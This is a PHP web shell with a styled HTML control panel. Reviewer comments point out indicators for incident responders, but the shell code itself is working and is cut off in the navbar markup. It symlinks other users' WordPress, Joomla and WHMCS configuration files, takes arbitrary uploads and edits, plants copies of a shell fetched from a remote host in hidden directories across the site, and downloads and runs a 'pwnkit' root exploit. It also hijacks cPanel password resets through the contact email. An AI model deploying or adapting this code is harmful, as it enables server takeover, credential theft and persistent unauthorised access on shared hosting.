// shared hosts: per-account filesystem isolation, configuration files readable
// only by their owner, and Apache's `SymLinksIfOwnerMatch` in place of
// `FollowSymLinks`. Detection: a directory named after SYMLINK_DIR holding
// links into other users' home directories.
function massSymlinkConfigs($usernames)
{
initSymlinkContainer();
if (!file_exists(SYMLINK_DIR . DIRECTORY_SEPARATOR . 'root')) @symlink('/', SYMLINK_DIR . DIRECTORY_SEPARATOR . 'root');
// label => path below the account's home directory
$patterns = [
'wp-config' => '/public_html/wp-config.php',
'word-wp' => '/public_html/wordpress/wp-config.php',
'wpblog' => '/public_html/blog/wp-config.php',
'wp-old' => '/public_html/wp/wp-config.php',
'wp-backup' => '/public_html/backup/wp-config.php',
'wp-old2' => '/public_html/old/wp-config.php',
'wp-2020' => '/public_html/2020/wp-config.php',
'wp-2021' => '/public_html/2021/wp-config.php',
'wp-2022' => '/public_html/2022/wp-config.php',
'wp-2023' => '/public_html/2023/wp-config.php',
'wp-new' => '/public_html/new/wp-config.php',
'wp-dev' => '/public_html/dev/wp-config.php',
'wp-stage' => '/public_html/staging/wp-config.php',
'wp-test' => '/public_html/test/wp-config.php',
'joomla-or-whmcs'=> '/public_html/configuration.php',
'joomla' => '/public_html/joomla/configuration.php',
'joomla-old' => '/public_html/old/configuration.php',
'joomla-backup' => '/public_html/backup/configuration.php',
'joomla-dev' => '/public_html/dev/configuration.php',
'vbinc' => '/public_html/vb/includes/config.php',
'vb' => '/public_html/includes/config.php',
'vb-old' => '/public_html/old/includes/config.php',
'vb-backup' => '/public_html/backup/includes/config.php',
'conf_global' => '/public_html/conf_global.php',
'inc' => '/public_html/inc/config.php',
'config' => '/public_html/config.php',
'Settings' => '/public_html/Settings.php',
'sites' => '/public_html/sites/default/settings.php',
'whm' => '/public_html/whm/configuration.php',
'whmcs' => '/public_html/whmcs/configuration.php',
'supportwhmcs' => '/public_html/support/configuration.php',
'WHM' => '/public_html/whmc/WHM/configuration.php',
'whmc' => '/public_html/whm/WHMCS/configuration.php',
'WHMcs' => '/public_html/whm/whmcs/configuration.php',
'whmcsupp' => '/public_html/support/configuration.php',
'whmcs-cli' => '/public_html/clients/configuration.php',
'whmcs-cl' => '/public_html/client/configuration.php',
'whmcs-CL' => '/public_html/clientes/configuration.php',
'whmcs-Cl' => '/public_html/cliente/configuration.php',
'whmcs-csup' => '/public_html/clientsupport/configuration.php',
'whmcs-bill' => '/public_html/billing/configuration.php',
'whmcs-old' => '/public_html/old/configuration.php',
'whmcs-backup' => '/public_html/backup/configuration.php',
'admin-conf' => '/public_html/admin/config.php',
'admin-old' => '/public_html/admin/old/config.php',
'admin-backup' => '/public_html/admin/backup/config.php',
'home1-wp' => '/home1/public_html/wp-config.php',
'home2-wp' => '/home2/public_html/wp-config.php',
'home3-wp' => '/home3/public_html/wp-config.php',
'home4-wp' => '/home4/public_html/wp-config.php',
'home5-wp' => '/home5/public_html/wp-config.php',
'html-wp' => '/html/wp-config.php',
'html-pub-wp' => '/html/public/wp-config.php',
'www-wp' => '/www/wp-config.php',
'www-pub-wp' => '/www/public/wp-config.php'
];
foreach ($usernames as $user) {
$user = trim($user);
if ($user === '') continue;
foreach ($patterns as $postfix => $path) {
createSymlink("/home/" . $user . $path, $user . ".." . $postfix);
}
}
}
// Request routing. The working directory comes from the Base64-encoded `p`
// query parameter and falls back to this script's directory when the decoded
// value is not an existing directory. Nothing restricts it to the web root,
// so any directory the PHP process can see may be selected.
$current_dir = dirname(__FILE__);
$path = isset($_GET['p']) ? dec($_GET['p']) : $current_dir;
if (!is_dir($path)) {
$path = $current_dir;
}
define('PATH', $path);
// `act` selects the view (default 'list'); `file` names the file acted on.
$action = isset($_GET['act']) ? $_GET['act'] : 'list';
$target = isset($_GET['file']) ? $_GET['file'] : '';
// Upload handler: stores the uploaded file in PATH under the basename of the
// client-supplied name, with no check on type or extension, then redirects
// with a status flag.
// NOTE(review): new executable files appearing in web directories right after
// multipart POSTs to this script are the log/filesystem correlation to look for.
if (isset($_POST['upload'])) {
$dest = PATH . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $dest)) {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
exit;
}
// Remote location of the content that the 'auto-shell' action writes into the
// site. NOTE(review): outbound requests from the web server to this URL are a
// network indicator.
$url1 = 'https://aurorafilemanager.github.io/Aurora.php';
// Fetches $url and returns the response body as a string, trying three
// transports in order: file_get_contents() with a stream context, cURL (when
// available), then fopen().
// Throws Exception("Failed to download content: ...") when the URL is
// malformed or every transport fails; the cause is also written to the error
// log.
// NOTE(review): TLS peer and peer-name verification are disabled in the stream
// context, so the fetched content is not authenticated. A browser-like
// User-Agent string is sent, so filtering egress on User-Agent alone will not
// single these requests out.
function download_content($url) {
try {
// Validate URL
if (!filter_var($url, FILTER_VALIDATE_URL)) {
throw new Exception("Invalid URL format");
}
// Set timeout and user agent
$ctx = stream_context_create([
'http' => [
'timeout' => 30,
'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'follow_location' => true
],
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false
]
]);
// Try file_get_contents first
$content = @file_get_contents($url, false, $ctx);
if ($content !== false) {
return $content;
}
// Try cURL if file_get_contents fails
if (function_exists('curl_init')) {
$content = download_content_with_curl($url);
if ($content !== false) {
return $content;
}
}
// Try fopen as last resort
$content = download_content_with_fopen($url);
if ($content !== false) {
return $content;
}
throw new Exception("All download methods failed");
} catch (Exception $e) {
error_log("Download error: " . $e->getMessage());
throw new Exception("Failed to download content: " . $e->getMessage());
}
}
// cURL transport for download_content(): returns the response body of $url as
// a string, or false on failure (the cURL error number and text are written to
// the error log).
// Follows up to 5 redirects with a 30-second timeout. Certificate and host
// verification are both disabled, so the response is not authenticated.
function download_content_with_curl($url) {
try {
$ch = curl_init($url);
if ($ch === false) {
throw new Exception("Failed to initialize cURL");
}
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_MAXREDIRS => 5,
CURLOPT_TIMEOUT => 30,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
]);
$content = curl_exec($ch);
// Error details are read before the handle is closed.
$error = curl_error($ch);
$errno = curl_errno($ch);
curl_close($ch);
if ($content === false) {
throw new Exception("cURL error ({$errno}): {$error}");
}
return $content;
} catch (Exception $e) {
error_log("cURL error: " . $e->getMessage());
return false;
}
}
// fopen() transport for download_content(): reads $url in 8192-byte chunks and
// returns the accumulated body, or false when the URL cannot be opened, a read
// fails or nothing was received (the reason is written to the error log).
function download_content_with_fopen($url) {
try {
$content = '';
$handle = @fopen($url, 'r');
if ($handle === false) {
throw new Exception("Failed to open URL");
}
stream_set_timeout($handle, 30);
while (!feof($handle)) {
$chunk = fread($handle, 8192);
if ($chunk === false) {
throw new Exception("Failed to read from stream");
}
$content .= $chunk;
}
fclose($handle);
// empty() also treats the one-character body "0" as no content.
if (empty($content)) {
throw new Exception("No content received");
}
return $content;
} catch (Exception $e) {
error_log("fopen error: " . $e->getMessage());
return false;
}
}
// Remove duplicate function definitions
// Builds the public URL of a file below the document root.
//   $filePath  absolute filesystem path of the file
// Returns scheme + host + the path with every occurrence of DOCUMENT_ROOT
// removed. The scheme is https when $_SERVER['HTTPS'] is set to something
// other than 'off' or the server port is 443. The host comes from the
// request's Host header, i.e. from the client.
function get_full_url($filePath) {
    $httpsFlagged = !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off';
    if ($httpsFlagged || $_SERVER['SERVER_PORT'] == 443) {
        $scheme = "https://";
    } else {
        $scheme = "http://";
    }
    $host = $_SERVER['HTTP_HOST'];
    $webPath = str_replace($_SERVER['DOCUMENT_ROOT'], '', $filePath);
    return $scheme . $host . $webPath;
}
// Persistence routine: downloads the content at $url once and writes a copy
// into every writable first-level subdirectory of $rootDir.
//   $rootDir  directory whose subdirectories receive a copy
//   $url      location the content is downloaded from
// Returns true when at least one file was written, false otherwise (the reason
// is logged and echoed as an alert).
// NOTE(review): filesystem artefacts a responder can hunt for, all taken from
// the code below:
//   - dot-prefixed directories named as in $folders_to_create under $rootDir;
//   - in each subdirectory, one file named "<dirname>_<uniqid>" ending in
//     .php, .inc.php, .ini.php or _function.php, mode 0644;
//   - a newly written .htaccess next to it where none existed.
// Removing the original shell therefore does not clean the site. Compare the
// whole tree against a known-good copy or restore it from one.
function create_files_in_subdirectories($rootDir, $url) {
try {
// Validate inputs
if (!is_dir($rootDir)) {
throw new Exception("Invalid root directory");
}
// Define common WordPress and system folders to create if they don't exist
$folders_to_create = array(
'.config',
'.wp-content',
'.wp-includes',
'.wp-admin',
'.system',
'.tmp',
'.cache',
'.local'
);
// Create hidden folders if they don't exist
foreach ($folders_to_create as $folder) {
$folder_path = $rootDir . DIRECTORY_SEPARATOR . $folder;
if (!file_exists($folder_path)) {if (@mkdir($folder_path, 0755, true)) {
// Set folder as hidden on Windows
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
@system("attrib +h \"$folder_path\"");
}
}
}
}
// Get content first to avoid multiple downloads
$content = download_content($url);
if (!$content) {
throw new Exception("Failed to download content from URL");
}
$created = false;
// Include both existing and newly created directories
$subdirs = array_merge(
array_filter(glob($rootDir . '/*', GLOB_ONLYDIR)),
array_filter(glob($rootDir . '/.*', GLOB_ONLYDIR))
);
foreach ($subdirs as $subdir) {
if (!is_writable($subdir)) {
continue;
}
$dirName = basename($subdir);
// The file name reuses the directory's own name as a prefix.
$randomName = uniqid($dirName . '_', true);
$extensions = array('.php', '.inc.php', '.ini.php', '_function.php');
foreach ($extensions as $ext) {
$filePath = $subdir . '/' . $randomName . $ext;
if (!file_exists($filePath)) {
if (file_put_contents($filePath, $content) !== false) {
@chmod($filePath, 0644);
$fullUrl = get_full_url($filePath);
// The URL is echoed into the page without HTML escaping.
echo "<div class='alert alert-success'>Created: <a href='$fullUrl' target='_blank'>$fullUrl</a></div>";
$created = true;
// Create .htaccess to protect the file
// The rules written disable directory listing and allow access from all.
$htaccess = $subdir . '/.htaccess';
if (!file_exists($htaccess)) {
$rules = "Options -Indexes\nOrder Allow,Deny\nAllow from all\n";
@file_put_contents($htaccess, $rules);
}
break; // Successfully created one file in this directory
}
}
}
}
if (!$created) {
throw new Exception("Could not create any backup files. Check directory permissions.");
}
return true;
} catch (Exception $e) {
error_log("Backup creation error: " . $e->getMessage());
echo "<div class='alert alert-danger'>Error: " . htmlspecialchars($e->getMessage()) . "</div>";
return false;
}
}
// ---------------------------------------------------------------------------
// POST handlers of the file manager: create directory, create file, save file.
// PATH, enc() and $target are defined outside this block.
//
// Analyst note: each handler writes to the filesystem with a name taken
// directly from the request and then answers with a redirect whose query
// string starts with "?Xcr00t" and ends in status=success or status=failed.
// In web-server logs this shows up as a POST to the script followed by a GET
// carrying those parameters; POST bodies (field names newdir/dirname,
// newfile/filename, save/content) are only visible if body logging or a WAF
// capture is in place.
// ---------------------------------------------------------------------------
// Create a directory named by $_POST['dirname'] under PATH; the name is used as
// received, without normalisation.
if (isset($_POST['newdir'])) {
if (@mkdir(PATH . DIRECTORY_SEPARATOR . $_POST['dirname'], 0755)) {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
exit;
}
// Create an empty file named by $_POST['filename'] (only when nothing exists at
// that path) and jump straight into the editor for it.
if (isset($_POST['newfile'])) {
$file = PATH . DIRECTORY_SEPARATOR . $_POST['filename'];
if (!file_exists($file) && file_put_contents($file, '') !== false) {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&act=edit&file=' . urlencode($_POST['filename']));
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
exit;
}
// Overwrite PATH/$target with the submitted editor content. This is the path by
// which existing site files can be modified in place, so file-integrity
// comparison against a known-good copy is the reliable way to find such edits.
if (isset($_POST['save'])) {
if (file_put_contents(PATH . DIRECTORY_SEPARATOR . $target, $_POST['content']) !== false) {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
exit;
}
// ---------------------------------------------------------------------------
// Dispatcher for the navbar actions, selected by the "action" query parameter.
// Relative paths below resolve against the PHP working directory. $url1, enc(),
// PATH, massSymlinkConfigs(), extractSystemUsers() and generatePhpIni() are
// defined outside this block.
//
// Analyst note: every branch leaves artefacts that can be searched for during
// incident response; they are named per case.
// ---------------------------------------------------------------------------
if (isset($_GET['action'])) {
switch ($_GET['action']) {
// Runs the persistence routine over the whole document root.
// NOTE(review): create_files_in_subdirectories() catches its own exceptions and
// returns false, and the return value is ignored here, so the "Success!" banner
// is printed whether or not any file was written and the catch below is
// effectively unreachable.
case 'auto-shell':
$rootDir = $_SERVER['DOCUMENT_ROOT'];
try {
create_files_in_subdirectories($rootDir, $url1);
echo '<div class="alert alert-success alert-dismissible fade show" role="alert">
<strong>Success!</strong> Backup shells have been created successfully.
<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
</div>';
} catch (Exception $e) {
echo '<div class="alert alert-danger alert-dismissible fade show" role="alert">
<strong>Error!</strong> ' . htmlspecialchars($e->getMessage()) . '
<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
</div>';
}
break;
// Fetches the Adminer database client from its GitHub release and stores it as
// adminer.php. Artefacts: an adminer.php the site owner did not deploy, and an
// outbound HTTPS request to github.com made by the PHP process.
case 'adminer':
$url = 'https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php';
if (@file_put_contents('adminer.php', @file_get_contents($url))) {
header('Location: adminer.php');
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
exit;
// Downloads a binary named "pwnkit", makes it executable, runs it once through
// shell_exec() and stores the output. Artefacts: files "pwnkit" and
// ".root_output" in the working directory, plus a child process spawned by the
// web-server user. The name matches the publicly known PwnKit polkit/pkexec
// local privilege escalation; presumably that is what the binary targets (not
// verifiable from this page). If ".root_output" reports uid 0, treat the whole
// host — not just the web root — as compromised.
case 'pwnkit':
if (!file_exists('pwnkit')) {
@file_put_contents('pwnkit', @file_get_contents('https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit'));
@chmod('pwnkit', 0755);
$output = @shell_exec('./pwnkit "id" 2>&1');
file_put_contents('.root_output', $output);
}
header('Location: ?Xcr00t&p=' . enc(PATH) . '&terminal=root');
exit;
// Overwrites <parent of document root>/.cpanel/contactinfo with a JSON object
// holding the submitted e-mail address, then redirects the browser to the
// password-reset page on port 2083. After an incident, compare that file (and
// the account's contact address in cPanel) with the legitimate value and review
// password-reset activity for the account.
case 'cpanel-reset':
if (isset($_POST['email'])) {
$path = dirname($_SERVER['DOCUMENT_ROOT']) . "/.cpanel/contactinfo";
$content = json_encode(['email' => $_POST['email']]);
if (@file_put_contents($path, $content)) {
header('Location: ' . $_SERVER['REQUEST_SCHEME'] . '://' . $_SERVER['SERVER_NAME'] . ':2083/resetpass?start=1');
exit;
}
}
break;
// Shown as "Anti Backdoor" in the navbar. Replaces .htaccess in the working
// directory with rules that deny every PHP-like file except index.php and this
// script's own file name. The previous .htaccess content (rewrite rules etc.) is
// lost, and the second FilesMatch pattern names the shell file — a .htaccess of
// this shape is a direct pointer to where the shell lives.
case 'backdoor':
$htaccess = '<FilesMatch "\.ph(p[3457]?|t|tml)$">
Order Deny,Allow
Deny from all
</FilesMatch>
<FilesMatch "^(' . basename($_SERVER['SCRIPT_FILENAME']) . '|index\.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>';
if (@file_put_contents('.htaccess', $htaccess)) {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
exit;
// Both helpers are defined outside this block; judging by the names only, they
// enumerate system accounts and create symlinks to configuration files —
// confirm against their definitions. Success is reported unconditionally.
case 'mass-symlink':
massSymlinkConfigs(extractSystemUsers());
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
exit;
// generatePhpIni() is defined outside this block; presumably it writes a
// php.ini override — check for unexpected php.ini / .user.ini files.
case 'phpini':
generatePhpIni();
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
exit;
}
}
// ---------------------------------------------------------------------------
// Remaining request handlers and the data the HTML template below needs.
// $action, $target, PATH, SCAN_READ_LIMIT, enc() and
// check_pwnkit_compatibility() are defined outside this block.
// ---------------------------------------------------------------------------
// Download: streams PATH/$target as an attachment. Responses with
// Content-Type application/octet-stream from a PHP script under the web root
// indicate files being copied off the server.
if ($action === 'download' && $target && is_file(PATH . DIRECTORY_SEPARATOR . $target)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($target) . '"');
readfile(PATH . DIRECTORY_SEPARATOR . $target);
exit;
}
// Delete: basename() limits the target to an entry directly inside PATH.
// rmdir() only removes empty directories; errors are silenced and the redirect
// is sent regardless of the outcome.
if (isset($_GET['del'])) {
$del = PATH . DIRECTORY_SEPARATOR . basename($_GET['del']);
if (is_dir($del)) @rmdir($del);
else @unlink($del);
header('Location: ?Xcr00t&p=' . enc(PATH));
exit;
}
// Directory listing for the table in the template, capped at SCAN_READ_LIMIT
// entries (so the displayed listing may be incomplete for large directories).
$dirs = $files = [];
if ($action === 'list') {
// NOTE(review): a static variable does not survive the end of the request, so
// this cache appears to start empty on every page load; md5() is used here only
// to derive an array key.
static $dirCache = [];
$cacheKey = md5(PATH);
if (isset($dirCache[$cacheKey])) {
list($dirs, $files) = $dirCache[$cacheKey];
} else {
$items = scandir(PATH);
$count = 0;
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
if ($count >= SCAN_READ_LIMIT) break;
$fullPath = PATH . DIRECTORY_SEPARATOR . $item;
if (is_dir($fullPath)) {
$dirs[] = $item;
} else {
$files[] = $item;
}
$count++;
}
$dirCache[$cacheKey] = [$dirs, $files];
// Keep at most 10 cached listings
if (count($dirCache) > 10) {
array_shift($dirCache);
}
}
}
// Hidden directory: prefixes the submitted name with '.' and creates it
// (recursively) under PATH. When the path already exists no redirect is sent and
// the response is empty.
if (isset($_POST['newhiddendir'])) {
$hiddenDirName = '.' . trim($_POST['hiddendirname']);
$hiddenDirPath = PATH . DIRECTORY_SEPARATOR . $hiddenDirName;
if (!file_exists($hiddenDirPath)) {
if (@mkdir($hiddenDirPath, 0755, true)) {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=success');
} else {
header('Location: ?Xcr00t&p=' . enc(PATH) . '&status=failed');
}
}
exit;
}
// Values for the "terminal=root" panel: a compatibility flag from a helper
// defined elsewhere, and the stored output of the earlier pwnkit run, read from
// ".root_output" in the working directory.
$is_compatible = check_pwnkit_compatibility();
$root_output = '';
if (isset($_GET['terminal']) && $_GET['terminal'] === 'root' && file_exists('.root_output')) {
$root_output = file_get_contents('.root_output');
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title id="dynamic-title"><?= APP_NAME ?></title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
<script>
// Cosmetic only: rotates the text of the <title> element one character every
// 300 ms, producing a scrolling tab title.
let titleText = document.getElementById("dynamic-title").innerHTML;
let position = 0;
setInterval(() => {
position = (position + 1) % titleText.length;
document.title = titleText.substring(position) + titleText.substring(0, position);
}, 300);
// Cosmetic only: once per second, writes the browser's local time and date into
// the elements with ids "current-time" and "current-date".
setInterval(() => {
let now = new Date();
let time = now.toLocaleTimeString();
let date = now.toLocaleDateString();
document.getElementById("current-time").innerHTML = time;
document.getElementById("current-date").innerHTML = date;
}, 1000);
</script>
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" rel="stylesheet">
<style>
:root {
--primary-bg: #0a0c0f;
--secondary-bg: #12151a;
--text-color: #e6edf3;
--border-color: #21262d;
--hover-color: #161b22;
--link-color: #2f81f7;
--success-color: #238636;
--danger-color: #da3633;
--warning-color: #9e6a03;
}
/* Enhanced overall styling */
body {
background:
radial-gradient(circle at 20% 80%, rgba(120, 0, 255, 0.1) 0%, transparent 50%),
radial-gradient(circle at 80% 20%, rgba(200, 0, 255, 0.1) 0%, transparent 50%),
radial-gradient(circle at 40% 40%, rgba(100, 0, 200, 0.05) 0%, transparent 50%),
linear-gradient(135deg, #0a0a0a 0%, #120929 50%, #0a0615 100%);
color: #e6e6ff;
font-family: 'Rajdhani', 'Courier New', monospace;
min-height: 100vh;
overflow-x: hidden;
position: relative;
}
/* NEURAL NETWORK BACKGROUND */
.neural-network {
position: fixed;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 0;
pointer-events: none;
}
/* LOGO CONTAINER YANG DIPERBAIKI */
.logo-container {
display: flex;
align-items: center;
gap: 20px;
margin-bottom: 20px;
flex-wrap: wrap;
}
.round-logo {
width: 80px;
height: 80px;
border-radius: 50%;
object-fit: cover;
border: 3px solid #8a2be2;
box-shadow:
0 0 20px rgba(138, 43, 226, 0.5),
inset 0 0 10px rgba(138, 43, 226, 0.3);
transition: all 0.4s ease;
position: relative;
overflow: hidden;
background: linear-gradient(135deg, #8a2be2, #9400d3);
display: flex;
align-items: center;
justify-content: center;
color: white;
font-weight: bold;
font-size: 12px;
text-align: center;
padding: 5px;
}
.round-logo::before {
content: '';
position: absolute;
top: -50%;
left: -50%;
width: 200%;
height: 200%;
background: linear-gradient(45deg,
transparent,
rgba(255,255,255,0.1),
transparent);
transform: rotate(45deg);
transition: all 0.6s ease;
}
.round-logo:hover::before {
transform: rotate(45deg) translate(50%, 50%);
}
.round-logo:hover {
transform: scale(1.15) rotate(5deg);
box-shadow:
0 0 40px rgba(138, 43, 226, 0.8),
0 0 60px rgba(148, 0, 211, 0.4),
inset 0 0 20px rgba(138, 43, 226, 0.5);
border-color: #da70d6;
}
/* Efek pulsating untuk logo */
@keyframes logoPulse {
0%, 100% {
box-shadow:
0 0 20px rgba(138, 43, 226, 0.5),
inset 0 0 10px rgba(138, 43, 226, 0.3);
}
50% {
box-shadow:
0 0 30px rgba(138, 43, 226, 0.7),
0 0 40px rgba(148, 0, 211, 0.3),
inset 0 0 15px rgba(138, 43, 226, 0.5);
}
}
.round-logo {
animation: logoPulse 3s ease-in-out infinite;
}
/* Container untuk logo dengan fallback */
.logo-fallback {
width: 80px;
height: 80px;
border-radius: 50%;
background: linear-gradient(135deg, #8a2be2, #9400d3);
display: flex;
align-items: center;
justify-content: center;
color: white;
font-weight: bold;
font-size: 10px;
text-align: center;
line-height: 1.2;
padding: 8px;
border: 3px solid #8a2be2;
box-shadow: 0 0 20px rgba(138, 43, 226, 0.5);
}
/* FIX UNTUK KEDIPAN - System Information */
.server-info {
background: linear-gradient(45deg, #2b3035, #212529) !important;
border-radius: 8px;
box-shadow: 0 2px 4px rgba(0,0,0,0.2);
position: relative;
z-index: 10;
backdrop-filter: blur(10px);
flex-grow: 1;
}
/* FIX UNTUK KEDIPAN - Notifikasi */
.alert {
position: relative;
z-index: 1000;
backdrop-filter: blur(10px);
animation: slideDown 0.3s ease-out;
}
@keyframes slideDown {
from {
opacity: 0;
transform: translateY(-20px);
}
to {
opacity: 1;
transform: translateY(0);
}
}
/* QUANTUM NAVBAR */
.quantum-navbar {
background: rgba(10, 5, 25, 0.8) !important;
backdrop-filter: blur(15px);
border-bottom: 1px solid rgba(138, 43, 226, 0.3);
box-shadow: 0 0 30px rgba(138, 43, 226, 0.2);
}
/* QUANTUM CARDS */
.quantum-card {
background: rgba(10, 5, 25, 0.7) !important;
border: 1px solid rgba(138, 43, 226, 0.3) !important;
border-radius: 15px;
backdrop-filter: blur(10px);
box-shadow: 0 0 30px rgba(138, 43, 226, 0.1);
color: #e6e6ff;
}
.quantum-card .card-header {
background: rgba(138, 43, 226, 0.2) !important;
border-bottom: 1px solid rgba(138, 43, 226, 0.3) !important;
color: #da70d6;
}
/* QUANTUM BUTTONS */
.quantum-btn {
background: linear-gradient(135deg, #8a2be2, #9400d3) !important;
border: none !important;
border-radius: 10px !important;
color: white !important;
transition: all 0.3s ease !important;
}
.quantum-btn:hover {
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(138, 43, 226, 0.4) !important;
}
/* FIX BACKGROUND TABLE - List File */
.quantum-table {
background: rgba(10, 5, 25, 0.8) !important;
border: 1px solid rgba(138, 43, 226, 0.3) !important;
border-radius: 15px;
backdrop-filter: blur(10px);
box-shadow: 0 0 30px rgba(138, 43, 226, 0.1);
color: #e6e6ff !important;
overflow: hidden;
}
.quantum-table thead th {
background: rgba(138, 43, 226, 0.2) !important;
border-bottom: 1px solid rgba(138, 43, 226, 0.3) !important;
color: #da70d6 !important;
font-weight: 600;
padding: 1rem;
text-align: left;
}
.quantum-table tbody td {
background: transparent !important;
border-bottom: 1px solid rgba(138, 43, 226, 0.1) !important;
color: #e6e6ff !important;
padding: 0.8rem 1rem;
vertical-align: middle;
}
.quantum-table tbody tr:hover {
background: rgba(138, 43, 226, 0.1) !important;
transition: all 0.3s ease;
}
.quantum-table tbody tr:last-child td {
border-bottom: none !important;
}
/* Link colors in table */
.quantum-table a {
color: #c9a0ff !important;
text-decoration: none;
transition: all 0.3s ease;
}
.quantum-table a:hover {
color: #da70d6 !important;
text-shadow: 0 0 10px rgba(218, 112, 214, 0.5);
}
/* Icon colors in table */
.quantum-table .fa-folder {
color: #ffd700 !important;
}
.quantum-table .fa-php {
color: #8a2be2 !important;
}
.quantum-table .fa-html5 {
color: #ff6b6b !important;
}
.quantum-table .fa-css3 {
color: #4dabf7 !important;
}
.quantum-table .fa-js {
color: #ffd43b !important;
}
.quantum-table .fa-python {
color: #ffd43b !important;
}
.quantum-table .fa-lock {
color: #ff6b6b !important;
}
.quantum-table .fa-image {
color: #51cf66 !important;
}
.quantum-table .fa-file {
color: #adb5bd !important;
}
/* Button styles in table */
.quantum-table .btn {
border-radius: 6px;
transition: all 0.3s ease;
}
.quantum-table .btn-outline-primary {
color: #8a2be2 !important;
border-color: #8a2be2 !important;
}
.quantum-table .btn-outline-primary:hover {
background: #8a2be2 !important;
color: white !important;
transform: translateY(-2px);
}
.quantum-table .btn-outline-success {
color: #51cf66 !important;
border-color: #51cf66 !important;
}
.quantum-table .btn-outline-success:hover {
background: #51cf66 !important;
color: white !important;
transform: translateY(-2px);
}
.quantum-table .btn-outline-danger {
color: #ff6b6b !important;
border-color: #ff6b6b !important;
}
.quantum-table .btn-outline-danger:hover {
background: #ff6b6b !important;
color: white !important;
transform: translateY(-2px);
}
/* Table responsive */
.table-responsive {
border-radius: 15px;
background: rgba(10, 5, 25, 0.3);
backdrop-filter: blur(5px);
padding: 1px;
}
.nav-hover {
transition: all 0.3s ease;
border: 1px solid transparent;
}
.nav-hover:hover {
background: rgba(255,255,255,0.1);
border: 1px solid rgba(255,255,255,0.2);
transform: translateY(-2px);
}
.nav-link {
color: rgba(255,255,255,0.8) !important;
font-weight: 500;
}
.nav-link:hover {
color: rgba(255,255,255,1) !important;
}
.navbar-nav {
gap: 5px;
}
@keyframes blink {
0% { opacity: 1; }
50% { opacity: 0; }
100% { opacity: 1; }
}
.blink {
animation: blink 1.5s infinite;
margin-right: 8px;
}
.breadcrumb {
background: linear-gradient(45deg, #2b3035, #212529) !important;
box-shadow: 0 2px 4px rgba(0,0,0,0.2);
}
/* Container dengan z-index lebih tinggi */
.container-fluid {
position: relative;
z-index: 10;
}
/* Responsive improvements */
@media (max-width: 768px) {
.logo-container {
justify-content: center;
text-align: center;
}
.round-logo {
width: 60px;
height: 60px;
font-size: 9px;
}
.logo-fallback {
width: 60px;
height: 60px;
font-size: 8px;
}
.server-info {
font-size: 0.8rem;
}
}
</style>
</head>
<body>
<!-- NEURAL NETWORK BACKGROUND -->
<canvas class="neural-network" id="neuralNetwork"></canvas>
<!-- QUANTUM NAVBAR -->
<nav class="navbar navbar-expand-lg quantum-navbar">
<div class="container-fluid">
<a class="navbar-brand text-light" href="?Xcr00t">
<i class="fas fa-terminal blink"></i> <?= APP_NAME ?>
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarContent">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarContent">
<ul class="navbar-nav ms-auto">
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=adminer">
<i class="fas fa-database fa-fw me-2"></i> Adminer
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=pwnkit">
<i class="fas fa-user-shield fa-fw me-2"></i> Auto Root
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="#" data-bs-toggle="modal" data-bs-target="#wpAdminModal">
<i class="fab fa-wordpress fa-fw me-2"></i> WP Admin
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="#" data-bs-toggle="modal" data-bs-target="#cpanelModal">
<i class="fas fa-server fa-fw me-2"></i> cPanel Reset
</a>
</li>
<li class="nav-item">
<a class="nav-link nav-hover rounded px-3 mx-1" href="?Xcr00t&p=<?= enc(PATH) ?>&action=backdoor">
<i class="fas fa-lock fa-fw me-2"></i> Anti Backdoor
